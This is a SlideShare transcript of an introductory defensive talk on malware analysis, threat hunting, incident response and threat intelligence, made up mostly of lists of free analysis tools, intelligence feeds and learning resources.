SlideShare ist ein Scribd-Unternehmen logo

Malware Analysis

Als PPTX, PDF herunterladen
R
Ramin Farajpour Cami

Malware Analysis Live

Technologie
1 von 40
R A M I N FA R A J P O U R C A M I T W I T T E R : M F 4 R R 3 L L G I T H U B : @ R A M I N F P Malware Analysis
METHODOLOGY FOR HANDLING SECURITY INCIDENTS, BREACHES, AND CYBER THREATS • 1] Threat Hunting • 2] Malware Analysis • 3] Incident Response • 4] Threat Intelligence
WHAT IS THREAT HUNTING? • The process of proactively and iterative searching through networks to detect and isolate advanced threats that evade existing security solutions. – Analysis track – Intercept – Eliminate adversaries lurking in a network – Tools : SIEM, IDS, Firewall • Video : https://www.exabeam.com/product/exabeam-threat-hunter/
THREAT HUNTER SKILLS • Data analytics and reporting skills — these include pattern recognition, technical writing, data science, problem solving and research. • Operating systems and networks knowledge — needs to know the ins and outs of the organizational systems and network. • Information security experience — including malware reverse engineering, adversary tracking and endpoint security. A threat hunter needs to have a clear understanding past and current tactics, techniques and procedures (TTPs) used by the attackers. • Programming language — at least one scripting language and one compiled language is common, though modern tools are increasingly eliminating the need for using scripting language.
THREAT HUNTING REFERENCE Name Description Attack&Ck Website for Information related to Hunting Techniques. The ThreatHunting Project Website for Information to start Threat HUNTPEDIA A very handfull book.
THREAT HUNTING TOOLS Name Version Description ELK Free A platform which help to create usecasses for threat huntng and hypothesis. Sysmon Free System Monitor (Sysmon) is a Windows system service and device driver that, once installed on a system, remains resident across system reboots to monitor and log system activity to the Windows event log. Osquery Free Performant endpoint visibility, Supoort all OS platform.
ELK • Beats - https://github.com/elastic/beats – Docs : https://github.com/elastic/beats#documentation-and-getting-started • ElasticSearch - https://www.elastic.co/elasticsearch/ • Logstash - https://github.com/elastic/logstash • Kibana - https://www.elastic.co/kibana/
WHAT IS MALWARE ANALYSIS ? • The process of understanding the behavior and purpose of a suspicious file or URL. The output of the analysis aids in the detection and mitigation of the potential threat – Malware investigation – Malware performance – The purpose of the malware – Malicious level of malware – Traffic analysis sent – How to connect to the server – Malware code structure – IOC with YARA/Snort • Malware analysis is that it helps Incident Responders (IR) and security analysts (ALERT)
MALWARE ANALYSIS SKILLS • Networking • IOC (indicator Analysis)  YARA / Snort • Static Analysis • Dynamic Analysis • Memory Forensics • RE (Reverse Engineering) • File Format • OS Internal • Coding / Script
WHAT IS INCIDENT RESPONSE ? • Structured approach to handle various types of security incidents, cyber threats, and data breaches. • The incident response methodology aims to identify, contain, and minimize the cost of a cyberattack or a live incident. • Why Is Incident Response Important? – Data breaches cost companie’s operational downtime, reputational, and financial loss. – For most of the organizations, breaches lead to devaluation of stock value and loss of customer trust. – To eliminate such risks, companies need a well-planned cybersecurity incident response plan, • https://youtu.be/NIKIJodcxOk
GRAPHITE – GRAFANA - DIAMOND • https://graphiteapp.org/ • https://github.com/grafana/grafana • Or https://github.com/prometheus/prometheus • https://github.com/python-diamond/Diamond Installing : https://github.com/SecurityTalks/Malware-Analysis
WHAT ARE THE COMMON TYPES OF INCIDENTS?
WHAT IS THREAT INTELLIGENCE? • Cyber threat information becomes once it has been collected, evaluated in the context of its source and reliability, and analyzed • It requires that analysts identify similarities and differences in vast quantities of information and detect deceptions to produce accurate, timely, and relevant intelligence.
THREAT INTELLIGENCE RESOURCE dydns Free Online emergingthreats for botcc Free Online fedotracker Free Online greensnow Free Online h3xtracker Free Online hphosts for malware Free Online iblocklist Free Online ibmxforce Free Online intercept.sh Free Online intercept.sh Free Online malc0de Free Online malware_traffic Free Online malwared.malwaremustdie.org Free Online malwared.malwaremustdie.org Free Online Source Name Subscription Status
BAD PACKETS CYBER THREAT INTELLIGENCE - EXAMPLE
STATIC MALWARE ANALYSIS DIE Free Windows, Linux, Mac Os Name Version Paltform PE Bear Free Windows PortEx Free Windows Manalyze Free Windows PE Studio Free Windows Mastiff Free Windows Exeinfo PE Free Windows CFF Explorer Free Windows PE Tools Free Windows FileAlyzer Free Windows PE Explorer Free Windows PE Insider Free Windows PE View Free Windows Chimprec Free Windows PEID Free Windows
REVERSE ENGINEERING Name Version Paltform IDA Paid Windows Ghidra Free Windows, Linux, Mac Os Cutter Free Windows Radare Free Linux
DYNAMIC MALWARE ANALYSIS
CODE EXECUTE?
CODE EXECUTE COMMAND!
SYSTEM CHECK
PERSISTENCE!
OS NAME!
ANTI DEBUGGING!
ENCODING? DeObfuscation ALFA SHELL V3 : https://github.com/raminfp/DeObfuscation_ALFA_SHELL_V3
WIN API
CHECK UP INTERNET
YOUTUBE CHANNEL FOR MALWARE ANALYSIS YouTube Channel Name OALabs Kindred Security Colin Hardy MalwareAnalysisForHedgehogs Michael Gillespie ReverseIT LiveOverflow hasherezade John Hammond MalwareTech RSA Conferenc Monnappa K A
DOCUMENT ANALYSIS – PDF / WORD / EXCEL Name Version Paltform Ole Tool Free Python Didier's PDF Tools Free Python Origami Free Ruby REMnux Free Virtual Machine PDF Free Binary ViperMonkey Free Python
MALWARE REPORT TECHNICAL • Summery – If (Init Access) – Category (Ransome, Rootkit, Bootkit) • File Metadata Information – Filename – MD5 Hash – File Type – File Size – SHA256 – PE Information / File less • Static Analysis – Domain / IP – Obfuscation and Encryption – Anti Reverse / Anti Sandbox • Dynamic Analysis – Execution – Connection to C&C – Logs – Traffic – YARA rule Reports : https://isc.sans.edu/diary/26750 https://isc.sans.edu/diary/26744 https://us-cert.cisa.gov/ncas/alerts/aa20-302a
WEAKNESSES CERT.IR / AFTA • Very bad style report • Ant activity in social media network • Ant activity in github • There isn’t content for cyber security • Copy & Paste news
SOLUTION • Activity in twitter • Activity in Github repo Open Source ( YARA ) • “Infrastructure Bug Bounty” (IBB) • Own Researching (Cafebazaar / p30download / soft98) • Publish on tools in Malware Analysis
HOW TO WORK WITH OTHER RESEARCHER? EXAMPLE
SHOULD FOLLOWING IN TWITTER • https://twitter.com/executemalware • https://twitter.com/malware_traffic • https://twitter.com/JRoosen • https://twitter.com/HONKONE_K • https://twitter.com/3xp0rtblog • https://twitter.com/mal_share • https://twitter.com/RedDrip7 • https://twitter.com/Arkbird_SOLG • https://twitter.com/MalwarePatrol • https://twitter.com/DidierStevens • https://twitter.com/CyberIOCs • https://twitter.com/DissectMalware • https://twitter.com/MITREattack • https://twitter.com/Ledtech3 • https://twitter.com/VK_Intel
THE END •Question?

Empfohlen

Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
Paul Melson
 
Malware forensic
Malware forensicMalware forensic
Malware forensic
SumeraHangi
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturity
DNIF
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
Dhruv Majumdar
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
Prakashchand Suthar
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query Language
Ross Wolf
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 
malware analysis
malware analysismalware analysis
malware analysis
20CS201AkashR
 

Empfohlen

Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
Paul Melson
 
Malware forensic
Malware forensicMalware forensic
Malware forensic
SumeraHangi
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturity
DNIF
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
Dhruv Majumdar
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
Prakashchand Suthar
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query Language
Ross Wolf
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 
malware analysis
malware analysismalware analysis
malware analysis
20CS201AkashR
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
Andrew McNicol
 
Introduction to Malware Detection and Reverse Engineering
Introduction to Malware Detection and Reverse EngineeringIntroduction to Malware Detection and Reverse Engineering
Introduction to Malware Detection and Reverse Engineering
intertelinvestigations
 
Threat hunting in cyber world
Threat hunting in cyber worldThreat hunting in cyber world
Threat hunting in cyber world
Akash Sarode
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
Ben Boyd
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
Sergey Soldatov
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
Teymur Kheirkhabarov
 
Malware forensics
Malware forensicsMalware forensics
Malware forensics
Sameera Amjad
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
Splunk
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
Splunk
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Katie Nickels
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
Vishal Kumar
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
Ammar WK
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
Digit Oktavianto
 
Basic malware analysis
Basic malware analysisBasic malware analysis
Basic malware analysis
securityxploded
 
Cyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersCyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down Intruders
Infosec
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
Sqrrl
 
Cyber Security Incident Response
Cyber Security Incident ResponseCyber Security Incident Response
Cyber Security Incident Response
PECB
 
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghCyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
OWASP Delhi
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
Morane Decriem
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
Michael Gough
 
Advanced Persistent Threats
Advanced Persistent ThreatsAdvanced Persistent Threats
Advanced Persistent Threats
ESET
 
Computer security
Computer securityComputer security
Computer security
Mohamed Abdo
 

Weitere ähnliche Inhalte

Was ist angesagt?

Cyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersCyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down Intruders
Infosec
 

Was ist angesagt? (20)

Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
 
Introduction to Malware Detection and Reverse Engineering
Introduction to Malware Detection and Reverse EngineeringIntroduction to Malware Detection and Reverse Engineering
Introduction to Malware Detection and Reverse Engineering
 
Threat hunting in cyber world
Threat hunting in cyber worldThreat hunting in cyber world
Threat hunting in cyber world
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
 
Malware forensics
Malware forensicsMalware forensics
Malware forensics
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
 
Basic malware analysis
Basic malware analysisBasic malware analysis
Basic malware analysis
 
Cyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersCyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down Intruders
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
 
Cyber Security Incident Response
Cyber Security Incident ResponseCyber Security Incident Response
Cyber Security Incident Response
 
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghCyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
 

Ähnlich wie Malware Analysis

михаил дударев
михаил дударевмихаил дударев
михаил дударев
apps4allru
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Lastline, Inc.
 
Revolutionizing Advanced Threat Protection
Revolutionizing Advanced Threat ProtectionRevolutionizing Advanced Threat Protection
Revolutionizing Advanced Threat Protection
Blue Coat
 
AI on Spark for Malware Analysis and Anomalous Threat Detection
AI on Spark for Malware Analysis and Anomalous Threat DetectionAI on Spark for Malware Analysis and Anomalous Threat Detection
AI on Spark for Malware Analysis and Anomalous Threat Detection
Databricks
 

Ähnlich wie Malware Analysis (20)

Advanced Persistent Threats
Advanced Persistent ThreatsAdvanced Persistent Threats
Advanced Persistent Threats
 
Computer security
Computer securityComputer security
Computer security
 
soctool.pdf
soctool.pdfsoctool.pdf
soctool.pdf
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
михаил дударев
михаил дударевмихаил дударев
михаил дударев
 
100 Security Operation Center Tools.pdf
100 Security Operation Center Tools.pdf100 Security Operation Center Tools.pdf
100 Security Operation Center Tools.pdf
 
SOC-BlueTEam.pdf
SOC-BlueTEam.pdfSOC-BlueTEam.pdf
SOC-BlueTEam.pdf
 
100 Security Operation Center Tools.pdf
100 Security Operation Center Tools.pdf100 Security Operation Center Tools.pdf
100 Security Operation Center Tools.pdf
 
100 Security Operation Center Tools EMERSON EDUARDO RODRIGUES
100 Security Operation Center Tools EMERSON EDUARDO RODRIGUES100 Security Operation Center Tools EMERSON EDUARDO RODRIGUES
100 Security Operation Center Tools EMERSON EDUARDO RODRIGUES
 
Talos
TalosTalos
Talos
 
Security in the age of open source - Myths and misperceptions
Security in the age of open source - Myths and misperceptionsSecurity in the age of open source - Myths and misperceptions
Security in the age of open source - Myths and misperceptions
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
 
Ready set hack
Ready set hackReady set hack
Ready set hack
 
Revolutionizing Advanced Threat Protection
Revolutionizing Advanced Threat ProtectionRevolutionizing Advanced Threat Protection
Revolutionizing Advanced Threat Protection
 
Operational Security Intelligence
Operational Security IntelligenceOperational Security Intelligence
Operational Security Intelligence
 
H@dfex 2015 malware analysis
H@dfex 2015 malware analysisH@dfex 2015 malware analysis
H@dfex 2015 malware analysis
 
AI on Spark for Malware Analysis and Anomalous Threat Detection
AI on Spark for Malware Analysis and Anomalous Threat DetectionAI on Spark for Malware Analysis and Anomalous Threat Detection
AI on Spark for Malware Analysis and Anomalous Threat Detection
 
Cisco Security Presentation
Cisco Security PresentationCisco Security Presentation
Cisco Security Presentation
 
Top 10 Software to Detect & Prevent Security Vulnerabilities from BlackHat US...
Top 10 Software to Detect & Prevent Security Vulnerabilities from BlackHat US...Top 10 Software to Detect & Prevent Security Vulnerabilities from BlackHat US...
Top 10 Software to Detect & Prevent Security Vulnerabilities from BlackHat US...
 
Operationalizing Security Intelligence
Operationalizing Security IntelligenceOperationalizing Security Intelligence
Operationalizing Security Intelligence
 

Mehr von Ramin Farajpour Cami

Mehr von Ramin Farajpour Cami (6)

How to assign a CVE to yourself?
How to assign a CVE to yourself?How to assign a CVE to yourself?
How to assign a CVE to yourself?
 
Bug bounty
Bug bountyBug bounty
Bug bounty
 
Linux kernel booting
Linux kernel bootingLinux kernel booting
Linux kernel booting
 
Make own you kernel os
Make own you kernel osMake own you kernel os
Make own you kernel os
 
Linux kernel system call
Linux kernel system callLinux kernel system call
Linux kernel system call
 
Linux kernel development
Linux kernel developmentLinux kernel development
Linux kernel development
 

Kürzlich hochgeladen

EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
 

Kürzlich hochgeladen (20)

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 

Malware Analysis

  • 1. R A M I N FA R A J P O U R C A M I T W I T T E R : M F 4 R R 3 L L G I T H U B : @ R A M I N F P Malware Analysis
  • 2.
  • 3. METHODOLOGY FOR HANDLING SECURITY INCIDENTS, BREACHES, AND CYBER THREATS • 1] Threat Hunting • 2] Malware Analysis • 3] Incident Response • 4] Threat Intelligence
  • 4. WHAT IS THREAT HUNTING? • The process of proactively and iterative searching through networks to detect and isolate advanced threats that evade existing security solutions. – Analysis track – Intercept – Eliminate adversaries lurking in a network – Tools : SIEM, IDS, Firewall • Video : https://www.exabeam.com/product/exabeam-threat-hunter/
  • 5. THREAT HUNTER SKILLS • Data analytics and reporting skills — these include pattern recognition, technical writing, data science, problem solving and research. • Operating systems and networks knowledge — needs to know the ins and outs of the organizational systems and network. • Information security experience — including malware reverse engineering, adversary tracking and endpoint security. A threat hunter needs to have a clear understanding past and current tactics, techniques and procedures (TTPs) used by the attackers. • Programming language — at least one scripting language and one compiled language is common, though modern tools are increasingly eliminating the need for using scripting language.
  • 6. THREAT HUNTING REFERENCE Name Description Attack&Ck Website for Information related to Hunting Techniques. The ThreatHunting Project Website for Information to start Threat HUNTPEDIA A very handfull book.
  • 7. THREAT HUNTING TOOLS Name Version Description ELK Free A platform which help to create usecasses for threat huntng and hypothesis. Sysmon Free System Monitor (Sysmon) is a Windows system service and device driver that, once installed on a system, remains resident across system reboots to monitor and log system activity to the Windows event log. Osquery Free Performant endpoint visibility, Supoort all OS platform.
  • 8. ELK • Beats - https://github.com/elastic/beats – Docs : https://github.com/elastic/beats#documentation-and-getting-started • ElasticSearch - https://www.elastic.co/elasticsearch/ • Logstash - https://github.com/elastic/logstash • Kibana - https://www.elastic.co/kibana/
  • 9. WHAT IS MALWARE ANALYSIS ? • The process of understanding the behavior and purpose of a suspicious file or URL. The output of the analysis aids in the detection and mitigation of the potential threat – Malware investigation – Malware performance – The purpose of the malware – Malicious level of malware – Traffic analysis sent – How to connect to the server – Malware code structure – IOC with YARA/Snort • Malware analysis is that it helps Incident Responders (IR) and security analysts (ALERT)
  • 10. MALWARE ANALYSIS SKILLS • Networking • IOC (indicator Analysis)  YARA / Snort • Static Analysis • Dynamic Analysis • Memory Forensics • RE (Reverse Engineering) • File Format • OS Internal • Coding / Script
  • 11. WHAT IS INCIDENT RESPONSE ? • Structured approach to handle various types of security incidents, cyber threats, and data breaches. • The incident response methodology aims to identify, contain, and minimize the cost of a cyberattack or a live incident. • Why Is Incident Response Important? – Data breaches cost companie’s operational downtime, reputational, and financial loss. – For most of the organizations, breaches lead to devaluation of stock value and loss of customer trust. – To eliminate such risks, companies need a well-planned cybersecurity incident response plan, • https://youtu.be/NIKIJodcxOk
  • 12. GRAPHITE – GRAFANA - DIAMOND • https://graphiteapp.org/ • https://github.com/grafana/grafana • Or https://github.com/prometheus/prometheus • https://github.com/python-diamond/Diamond Installing : https://github.com/SecurityTalks/Malware-Analysis
  • 13. WHAT ARE THE COMMON TYPES OF INCIDENTS?
  • 14. WHAT IS THREAT INTELLIGENCE? • Cyber threat information becomes once it has been collected, evaluated in the context of its source and reliability, and analyzed • It requires that analysts identify similarities and differences in vast quantities of information and detect deceptions to produce accurate, timely, and relevant intelligence.
  • 15. THREAT INTELLIGENCE RESOURCE dydns Free Online emergingthreats for botcc Free Online fedotracker Free Online greensnow Free Online h3xtracker Free Online hphosts for malware Free Online iblocklist Free Online ibmxforce Free Online intercept.sh Free Online intercept.sh Free Online malc0de Free Online malware_traffic Free Online malwared.malwaremustdie.org Free Online malwared.malwaremustdie.org Free Online Source Name Subscription Status
  • 16. BAD PACKETS CYBER THREAT INTELLIGENCE - EXAMPLE
  • 17. STATIC MALWARE ANALYSIS DIE Free Windows, Linux, Mac Os Name Version Paltform PE Bear Free Windows PortEx Free Windows Manalyze Free Windows PE Studio Free Windows Mastiff Free Windows Exeinfo PE Free Windows CFF Explorer Free Windows PE Tools Free Windows FileAlyzer Free Windows PE Explorer Free Windows PE Insider Free Windows PE View Free Windows Chimprec Free Windows PEID Free Windows
  • 18.
  • 19.
  • 20. REVERSE ENGINEERING Name Version Paltform IDA Paid Windows Ghidra Free Windows, Linux, Mac Os Cutter Free Windows Radare Free Linux
  • 22.
  • 23.
  • 30. ENCODING? DeObfuscation ALFA SHELL V3 : https://github.com/raminfp/DeObfuscation_ALFA_SHELL_V3
  • 33. YOUTUBE CHANNEL FOR MALWARE ANALYSIS YouTube Channel Name OALabs Kindred Security Colin Hardy MalwareAnalysisForHedgehogs Michael Gillespie ReverseIT LiveOverflow hasherezade John Hammond MalwareTech RSA Conferenc Monnappa K A
  • 34. DOCUMENT ANALYSIS – PDF / WORD / EXCEL Name Version Paltform Ole Tool Free Python Didier's PDF Tools Free Python Origami Free Ruby REMnux Free Virtual Machine PDF Free Binary ViperMonkey Free Python
